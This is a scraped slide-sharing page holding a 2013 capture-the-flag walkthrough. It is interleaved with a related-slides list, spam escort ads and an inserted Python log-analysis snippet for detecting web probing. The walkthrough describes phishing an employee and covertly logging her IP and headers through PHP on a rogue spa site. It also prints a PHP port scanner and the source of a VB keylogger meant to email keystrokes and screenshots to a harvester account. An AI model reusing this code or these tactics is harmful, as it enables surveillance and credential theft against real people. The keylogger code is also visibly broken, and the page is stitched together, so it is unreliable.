So with our downloaded keypair from the mail we logged in to the db server.
Then we became super user: 
Then we read the history file and more secrets : 
cat .bash_history 
So there's another keypair but to the .2 server i.e. webserver, remember from
phpinfo? SSH is on port 49800, on checking files in the ubuntu home directory the
key and yes it's just that into the webserver.
Again get Root 
Well we’d say we are done but we needed to share our joy so on to /var/www and 
like any movie give credits to the actors :D 
We'd like to thank Gichuki Jonia (./chuks) for the challenge, we learnt a lot while
doing it, and Azanuru for the infrastructure. Made all this possible ☺.
Munir Njiru || Ruth Efrain || Ibrahim Gathungu 
M a r c h 2 8 , 2 0 1 4

More Related Content

Similar to Hackbattle 2013 Walkthrough (Nasty Salon V2)

Web Design World Flickr
Web Design World FlickrWeb Design World Flickr
Web Design World Flickrroyans
 
Teach Your Sites to Call for Help: Automated Problem Reporting for Online Ser...
Teach Your Sites to Call for Help: Automated Problem Reporting for Online Ser...Teach Your Sites to Call for Help: Automated Problem Reporting for Online Ser...
Teach Your Sites to Call for Help: Automated Problem Reporting for Online Ser...Caktus Group
 
Call your key to phone all
Call your key to phone allCall your key to phone all
Call your key to phone allGerard Fuguet
 
Footprinting-and-the-basics-of-hacking
Footprinting-and-the-basics-of-hackingFootprinting-and-the-basics-of-hacking
Footprinting-and-the-basics-of-hackingSathishkumar A
 
Corporate Secret Challenge - CyberDefenders.org by Azad
Corporate Secret Challenge - CyberDefenders.org by AzadCorporate Secret Challenge - CyberDefenders.org by Azad
Corporate Secret Challenge - CyberDefenders.org by AzadAzad Mzuri
 
Cross-platform logging and analytics
Cross-platform logging and analyticsCross-platform logging and analytics
Cross-platform logging and analyticsDrew Crawford
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
 
Adding serverless to legacy applications
Adding serverless to legacy applicationsAdding serverless to legacy applications
Adding serverless to legacy applicationsbrettflorio
 
GNUCITIZEN Pdp Owasp Day September 2007
GNUCITIZEN Pdp Owasp Day   September 2007GNUCITIZEN Pdp Owasp Day   September 2007
GNUCITIZEN Pdp Owasp Day September 2007guest20ab09
 
DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generators
DEF CON 27 - BEN SADEGHIPOUR  - owning the clout through ssrf and pdf generatorsDEF CON 27 - BEN SADEGHIPOUR  - owning the clout through ssrf and pdf generators
DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generatorsFelipe Prado
 
WebHooks in 10 Minutes
WebHooks in 10 MinutesWebHooks in 10 Minutes
WebHooks in 10 MinutesJeff Lindsay
 
From Ruby to Node.js
From Ruby to Node.jsFrom Ruby to Node.js
From Ruby to Node.jsjubilem
 
Proper Connections Development for Proper Domino Developers
Proper Connections Development for Proper Domino DevelopersProper Connections Development for Proper Domino Developers
Proper Connections Development for Proper Domino DevelopersMark Myers
 
Pipe your script to slack
Pipe your script to slackPipe your script to slack
Pipe your script to slackChikashi Kato
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKINGNAWAZ KHAN
 
Tutorial: extending the zend server ui and web api
Tutorial: extending the zend server ui and web apiTutorial: extending the zend server ui and web api
Tutorial: extending the zend server ui and web apiYonni Mendes
 
38199728 multi-player-tutorial
38199728 multi-player-tutorial38199728 multi-player-tutorial
38199728 multi-player-tutorialalfrecaay
 

Similar to Hackbattle 2013 Walkthrough (Nasty Salon V2) (20)

Web Design World Flickr
Web Design World FlickrWeb Design World Flickr
Web Design World Flickr
 
Teach Your Sites to Call for Help: Automated Problem Reporting for Online Ser...
Teach Your Sites to Call for Help: Automated Problem Reporting for Online Ser...Teach Your Sites to Call for Help: Automated Problem Reporting for Online Ser...
Teach Your Sites to Call for Help: Automated Problem Reporting for Online Ser...
 
Call your key to phone all
Call your key to phone allCall your key to phone all
Call your key to phone all
 
Footprinting-and-the-basics-of-hacking
Footprinting-and-the-basics-of-hackingFootprinting-and-the-basics-of-hacking
Footprinting-and-the-basics-of-hacking
 
Corporate Secret Challenge - CyberDefenders.org by Azad
Corporate Secret Challenge - CyberDefenders.org by AzadCorporate Secret Challenge - CyberDefenders.org by Azad
Corporate Secret Challenge - CyberDefenders.org by Azad
 
Cross-platform logging and analytics
Cross-platform logging and analyticsCross-platform logging and analytics
Cross-platform logging and analytics
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
 
Adding serverless to legacy applications
Adding serverless to legacy applicationsAdding serverless to legacy applications
Adding serverless to legacy applications
 
GNUCITIZEN Pdp Owasp Day September 2007
GNUCITIZEN Pdp Owasp Day   September 2007GNUCITIZEN Pdp Owasp Day   September 2007
GNUCITIZEN Pdp Owasp Day September 2007
 
DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generators
DEF CON 27 - BEN SADEGHIPOUR  - owning the clout through ssrf and pdf generatorsDEF CON 27 - BEN SADEGHIPOUR  - owning the clout through ssrf and pdf generators
DEF CON 27 - BEN SADEGHIPOUR - owning the clout through ssrf and pdf generators
 
Introduction to python scrapping
Introduction to python scrappingIntroduction to python scrapping
Introduction to python scrapping
 
WebHooks in 10 Minutes
WebHooks in 10 MinutesWebHooks in 10 Minutes
WebHooks in 10 Minutes
 
From Ruby to Node.js
From Ruby to Node.jsFrom Ruby to Node.js
From Ruby to Node.js
 
Proper Connections Development for Proper Domino Developers
Proper Connections Development for Proper Domino DevelopersProper Connections Development for Proper Domino Developers
Proper Connections Development for Proper Domino Developers
 
2023-May.pptx
2023-May.pptx2023-May.pptx
2023-May.pptx
 
Pipe your script to slack
Pipe your script to slackPipe your script to slack
Pipe your script to slack
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
 
Yahoo is open to developers
Yahoo is open to developersYahoo is open to developers
Yahoo is open to developers
 
Tutorial: extending the zend server ui and web api
Tutorial: extending the zend server ui and web apiTutorial: extending the zend server ui and web api
Tutorial: extending the zend server ui and web api
 
38199728 multi-player-tutorial
38199728 multi-player-tutorial38199728 multi-player-tutorial
38199728 multi-player-tutorial
 

Recently uploaded

Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersDamian Radcliffe
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Servicegwenoracqe6
 
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445ruhi
 
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebGDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebJames Anderson
 
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated  Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...Top Rated  Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...Call Girls in Nagpur High Profile
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Sheetaleventcompany
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...tanu pandey
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024APNIC
 
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663
✂️ 👅 Independent Andheri Escorts With Room Vashi Call Girls 💃 9004004663Call Girls Mumbai
 
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Ashram Chowk Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa  Call Girls Real Photos and Genuine ServiceHot Service (+9316020077 ) Goa  Call Girls Real Photos and Genuine Service
Hot Service (+9316020077 ) Goa Call Girls Real Photos and Genuine Servicesexy call girls service in goa
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxellan12
 
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$
Call Girls Dubai Prolapsed O525547819 Call Girls In Dubai Princes$kojalkojal131
 
Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Sarai Rohilla Escort Service Delhi N.C.R.soniya singh
 
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.
INDIVIDUAL ASSIGNMENT #3 CBG, PRESENTATION.CarlotaBedoya1
 
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...Neha Pandey
 
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceDelhi Call girls
 
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...
(+971568250507  ))#  Young Call Girls  in Ajman  By Pakistani Call Girls  in ...(+971568250507  ))#  Young Call Girls  in Ajman  By Pakistani Call Girls  in ...
(+971568250507 ))# Young Call Girls in Ajman By Pakistani Call Girls in ...Escorts Call Girls
 

Recently uploaded (20)

Moving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providersMoving Beyond Twitter/X and Facebook - Social Media for local news providers
Moving Beyond Twitter/X and Facebook - Social Media for local news providers
 
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
Dwarka Sector 26 Call Girls | Delhi | 9999965857 🫦 Vanshika Verma More Our Se...
 
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl ServiceRussian Call girl in Ajman +971563133746 Ajman Call girl Service
Russian Call girl in Ajman +971563133746 Ajman Call girl Service
 
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
 
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark WebGDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
GDG Cloud Southlake 32: Kyle Hettinger: Demystifying the Dark Web
 
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated  Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...Top Rated  Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
Top Rated Pune Call Girls Daund ⟟ 6297143586 ⟟ Call Me For Genuine Sex Servi...
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...

Hackbattle 2013 Walkthrough (Nasty Salon V2)

  • 1. Munir Njiru || Ruth Efrain || Ibrahim Gathungu HackBattle 2013 WalkThrough March 28, 2014
  • 2. The Scenario. The Process. The server looks well protected from the above scenario, but it also shows evidence of workstations which are not behind the same firewall. In team 0wnErz's case these were the best target, but how to get to them was the tricky bit. So the starting point was what we see, i.e. http://197.232.19.194. Looking at the site: static HTML, nothing fancy on it, no PHP code, therefore ruling out all possibility of SQL injections, which is everyone's juicy cake. Going for the forms: drat, those mail too, so no PHP form to post to. The worst you get was directory listing and failed Adobe gallery scripts missing from the gallery page; damn, those would have helped us read the logs, as they need that access to work. So what now? Look at what the site has to offer. Found 2 emails:
  • 3. · Joan.wokabi@gmail.com – Manager (Home Page) · Daniella.wambuas@gmail.com – IT Staff Manager (About Us Page) So basically for now we have 2 managers, a business one and a techie one, so from here the push was for the business manager; let's see if she can help us. So our first contact was to complain about the lack of user experience on the appointment page, nothing fancy, just to see how she takes it and gauge our audience. This is how it went. She replied, and it's apparent that she does care about user experience. One thing noted though: she copied daniella in the response, who we found out is Daniel, and the email was misspelled on the site. So next, a little bit more getting to know about the whereabouts, but noticing there is a "database" where we have been recorded, but where?? Nice!!!!!! A little bit more talk and she asks for more information about us, and we gladly give our alias, justifying our email too as to why it is not so personalized ;). On doing this, and with the rapport building up, Joan mentions something important … she input us in the database and she has access to it; also from her email we can see that there's an application to manage a database.
  • 5. I don't know about you but most people I know have: · phpMyAdmin · sqlbuddy Let's go with number one though, and the most common install directories for the system. Well, long story short, after a slow trial and error we found a /data directory. Cool, I know, right. ☺ Progress finally, but now we need to tread carefully. Now there are 2 things we can do: · try exploit the phpMyAdmin · try trap Joan and compromise Joan's machine, since she has access. We decided to try both but weigh our chances. phpMyAdmin: So step one was view the
  • 6. Also notice test.php, well, that's phpinfo: an awesome wealth of information about the server:
  • 7. Server root: /etc/apache2; webroot: /var/www/; User/Group: www-data(33)/33; PHP version: 5.5.3-1ubuntu2.2; allow_url_fopen: On; MySQL: 5.5.35; internal IP: 192.168.200.2. Back to phpMyAdmin. Well, we are dealing with one revision from the latest version: it's 4.1.8. What are the odds we will kill this thing and go free? Well, seeing the prompt tells you that no user goes in without a pass, so we download the same version of phpMyAdmin and install it on our end. Now only one problem: we create a valid login to a default db, i.e. mysql, however we can't replay the 4 cookies. As we realized later, this is because the online one lacked mcrypt while we had it, therefore our cookie pattern was quite different.
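Added example (not part of the original walkthrough): a defender-side check for the two findings above, the /data phpMyAdmin directory located by slow trial and error and the exposed test.php phpinfo page. It flags a client by the number of distinct missing paths it requests over a long window rather than by request rate, then lists what that client reached that no other visitor asked for. The log lines, client addresses, thresholds and function names are constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample in Apache combined log format (documentation address ranges).
# 203.0.113.7 guesses admin-tool directories roughly every 40 minutes;
# 198.51.100.20 is an ordinary visitor following links on the site.
SAMPLE_LOG = """\
198.51.100.20 - - [10/Mar/2014:09:15:01 +0300] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2014:09:15:02 +0300] "GET /favicon.ico HTTP/1.1" 404 289 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2014:09:15:20 +0300] "GET /about.html HTTP/1.1" 200 4301 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Mar/2014:09:15:48 +0300] "GET /gallery.html HTTP/1.1" 200 3988 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:09:00:12 +0300] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:09:41:03 +0300] "GET /phpmyadmin/ HTTP/1.1" 404 289 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:10:22:47 +0300] "GET /pma/ HTTP/1.1" 404 289 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:11:05:30 +0300] "GET /sqlbuddy/ HTTP/1.1" 404 289 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:11:49:18 +0300] "GET /admin/ HTTP/1.1" 404 289 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:12:30:02 +0300] "GET /db/ HTTP/1.1" 404 289 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:13:12:44 +0300] "GET /data/ HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:13:55:09 +0300] "GET /test.php HTTP/1.1" 200 70211 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse(log_text):
    """Return time-sorted (timestamp, client, path, status) tuples."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"].split("?", 1)[0]  # ignore query strings
        events.append((ts, m["ip"], path, int(m["status"])))
    events.sort()
    return events


def peak_per_minute(events, ip):
    """Highest request count in any single minute: what a rate limit sees."""
    buckets = Counter(ts.replace(second=0) for ts, src, _, _ in events if src == ip)
    return max(buckets.values(), default=0)


def find_probers(events, min_distinct=5, window=timedelta(hours=24)):
    """Flag clients with >= min_distinct different 404 paths inside the window.

    Counting distinct missing paths over a long window catches guessing that
    is spread out in time, which a per-minute threshold never sees.
    """
    misses = defaultdict(list)
    for ts, ip, path, status in events:
        if status == 404:
            misses[ip].append((ts, path))
    flagged = {}
    for ip, hits in misses.items():
        start, in_window = 0, Counter()
        for ts, path in hits:
            in_window[path] += 1
            while ts - hits[start][0] > window:  # slide the window forward
                old = hits[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            if len(in_window) >= min_distinct:
                flagged[ip] = sorted(in_window)
                break
    return flagged


def unlinked_hits(events, probers):
    """Paths a flagged client reached that no unflagged client ever requested.

    These are the resources that were found by guessing rather than by
    following links: here the database front end and the phpinfo page.
    """
    seen_by_others = {path for _, ip, path, _ in events if ip not in probers}
    found = defaultdict(set)
    for _, ip, path, status in events:
        if ip in probers and status != 404 and path not in seen_by_others:
            found[ip].add(path)
    return {ip: sorted(paths) for ip, paths in found.items()}


if __name__ == "__main__":
    evts = parse(SAMPLE_LOG)
    probers = find_probers(evts)
    for ip, guessed in probers.items():
        print(ip, "peak/min:", peak_per_minute(evts, ip), "guessed:", guessed)
    print("reached by guessing:", unlinked_hits(evts, probers))
```

Anything reported by `unlinked_hits` is a candidate for removal or access control: a database front end does not need to be reachable from the internet, and a phpinfo page does not belong on a production host.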
  • 8. "God blesses those who put errors on their homepage, and this server wasn't blessed, it was cursed!!!" So let's go the Joan way first; if she has access to this we shall know, but we need to be smart about this, so here is the breakdown of the needs. · Find Joan's environment: she must be one of the workstations; what's she running, what's her address, etc. · Come up with a super trap and hook Joan to it, then get enough info to steal her credentials and login as her. So for the first, team 0wnErz went with making the competition: first acquire a rogue domain, and we got http://spa.oo3.co. We took a few days to just make a nice HTML site for a spa but added a bit of PHP code in two sections: the first took her information as she visited the home page and wrote it to a text file, and in case she missed that we had another similar hook that mailed us the information when she submitted a form. The information we needed most was: · IP · Full User Agent information, including OS information, to aid in performing our attack.
  • 9. The Site: The script on the homepage had this PHP added to it. It wrote to two files: the first got a summary of just what we needed, and the second everything, in case there were extras:
        <?php
        $filename="0xt0uaipg.africahackon";
        $filename2="0xt0uaipg2.africahackon";
        $data="Server IP: ".$_SERVER['REMOTE_ADDR']."\n User Agent: ".$_SERVER['HTTP_USER_AGENT']."\n X-Forwarder:".$_SERVER['HTTP_X_FORWARDED_FOR']."\n ###############################################################\n\n";
        file_put_contents($filename, $data, FILE_APPEND, $context = null);
        foreach ($_SERVER as $key => $value) {
            $fullheaders .= $key . ": " . $value . "\n \n";
            file_put_contents($filename2, $fullheaders, FILE_APPEND, $context = null);
        }
        ?>
  • 10. So we talked to Joan to check it out and she did: ;)
  • 11. So she is on an XP and her IP is as is on screen. Firefox 27, damn, that is a lot of work here if we go for a browser attack ☺, but let's check if the IP is for a router or proxy or the actual machine. So we made a simple port scanner, none noisy:
        <?php
        echo "####################################<br/>\nTeam 0wnErz HB2013 PortScanner <br/>\n ####################################<br/><br />\n";
        $host = "197.232.19.195";
        $ports=array("21","22","23","25","53","80","110","143","139","389","443","587","1352","1433","3306","3389","5900","8080");
        $arrlength=count($ports);
        for($i=0;$i<$arrlength;$i++)
        {
            $fp = fsockopen($host,$ports[$i],$errno,$errstr,10);
            if($fp)
  • 12.
            {
                echo "port " . $ports[$i] . " open on " . $host ."<br />\n";
                echo "<br/>";
                fclose($fp);
            }
            else
            {
                echo "port " . $ports[$i] . " closed on " . $host . "<br />\n";
                echo "<br/>";
            }
            flush();
        }
        ?>
    Anyway, as you can see, nothing fancy: fsock is like telnet in PHP :D only we can do it from our webserver, online or locally. If it gets blacklisted, it is easy to move to another server and continue, but we didn't,…. no noise :D Interesting: http and Rdesktop is on this thing, but rdesktop is important, let's test it.
  • 13. Windows Server 2003 WTF :D . Ok someone’s playing us so now part 2 of our attack needs to be smart we don’t have a very direct target. Since we are dealing with an XP , that but either way we will need a windows payload , windows xp and server 2003 lack elevated desktop so binding some nice app good results. If you like commercially done keyloggers you can get things like redfox and ardamax etc limitless but nway save yourself the hustle and write some code signature based AV’s won’t have them most probably and keep it on simple logic not complex hooks those get flagged ince user agent didn’t lie or rather we chose to believe Don’t get jealous ours does : application to a keylogger flagged. · Screenshots and keys every ten minutes to our harvester email. and apps keys have been trapped from way don’t download and run :D we put our things together the simple D. Gmail one. Easiest to send to. in VB. its because we want to reduce dependencies and Munir Njiru || Ruth Efrain || Ibrahim Gathungu Note: You need a harvester email preferably a Here is a snippet from the logic of our keylogger ‘basic emailer include and simple system output Imports System.IO Imports System.Net.Mail ‘ yes if you are asking why the driver declares below it work with what windows already has. Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer M a r c h 2 8 , 2 0 1 4 lication should yield And keys s
  • 14. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 Private Declare Function RegisterServiceProcess Lib "Kernel32.dll" (ByVal dwProcessId As Integer, ByVal dwType As Integer) As Integer Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32 Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32 ‘basic house cleaning for caps and shift key presses so that we accurately record letters as caps or not caps in our main keylogger Public Function CAPSLOCKON() As Boolean If My.Computer.Keyboard.CapsLock = True Then Return True Else Return False End If End Function Dim mimiNiCapsAmaLa As Integer Dim Shifter As Integer ‘Keylogger Engine- usually behind your timer ;) ours is a 10 minute space on the highest of our 3 timers and a textbox to pass your data through. Shifter = GetAsyncKeyState(System.Windows.Forms.Keys.ShiftKey) mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.A) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "A" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "a" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.B) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "B"
  • 15. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "b" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.C) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "C" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "c" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.D) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "D" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "d" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.E) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "E" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "e"
  • 16. Munir Njiru || Ruth Efrain || Ibrahim Gathungu M a r c h 2 8 , 2 0 1 4 End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.F) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "F" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "f" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.G) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = False And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "G" End If If (CAPSLOCKON() = False And Shift = 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Or (CAPSLOCKON() = True And Shift <> 0 And (mimiNiCapsAmaLa And &H1S) = &H1S) Then txtNishikieKeys.Text = txtNishikieKeys.Text & "g" End If mimiNiCapsAmaLa = GetAsyncmimiNiCapsAmaLa (System.Windows.Forms.Keys.H) If (CAPSLOCKON() = True And Shift = 0 And (mimiNiCapsAmaLa And 